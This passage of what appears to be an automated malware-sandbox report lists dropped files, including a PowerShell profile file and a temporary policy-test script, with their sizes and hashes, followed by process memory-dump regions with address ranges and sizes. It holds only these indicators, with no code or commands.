        SHA256

        98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

        SHA512

        dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        88be3bc8a7f90e3953298c0fdbec4d72

        SHA1

        f4969784ad421cc80ef45608727aacd0f6bf2e4b

        SHA256

        533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

        SHA512

        4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3tspjlr1.hwv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/876-36-0x000001ED58890000-0x000001ED58906000-memory.dmp

        Filesize

        472KB

      • memory/876-37-0x000001ED3FDB0000-0x000001ED3FE00000-memory.dmp

        Filesize

        320KB

      • memory/876-76-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-2-0x000001ED58780000-0x000001ED58790000-memory.dmp

        Filesize

        64KB

      • memory/876-85-0x000001ED58750000-0x000001ED58762000-memory.dmp

        Filesize

        72KB

      • memory/876-0-0x000001ED3E0F0000-0x000001ED3E130000-memory.dmp

        Filesize

        256KB

      • memory/876-107-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-1-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-84-0x000001ED3FE00000-0x000001ED3FE0A000-memory.dmp

        Filesize

        40KB

      • memory/876-88-0x000001ED58780000-0x000001ED58790000-memory.dmp

        Filesize

        64KB

      • memory/876-38-0x000001ED3FD80000-0x000001ED3FD9E000-memory.dmp

        Filesize

        120KB

      • memory/1664-102-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1664-90-0x000001B3509B0000-0x000001B3509C0000-memory.dmp

        Filesize

        64KB

      • memory/1664-89-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2576-11-0x000002A8A06C0000-0x000002A8A06D0000-memory.dmp

        Filesize

        64KB

      • memory/2576-12-0x000002A8A06C0000-0x000002A8A06D0000-memory.dmp

        Filesize

        64KB

      • memory/2576-9-0x000002A8A0680000-0x000002A8A06A2000-memory.dmp

        Filesize

        136KB

      • memory/2576-10-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2576-18-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-21-0x000001ED12C00000-0x000001ED12C10000-memory.dmp

        Filesize

        64KB

      • memory/2932-108-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-22-0x000001ED12C00000-0x000001ED12C10000-memory.dmp

        Filesize

        64KB

      • memory/2932-20-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3908-78-0x0000013FF06B0000-0x0000013FF06C0000-memory.dmp

        Filesize

        64KB

      • memory/3908-82-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3908-79-0x0000013FF06B0000-0x0000013FF06C0000-memory.dmp

        Filesize

        64KB

      • memory/3908-77-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4728-66-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4728-64-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-41-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-40-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-39-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB
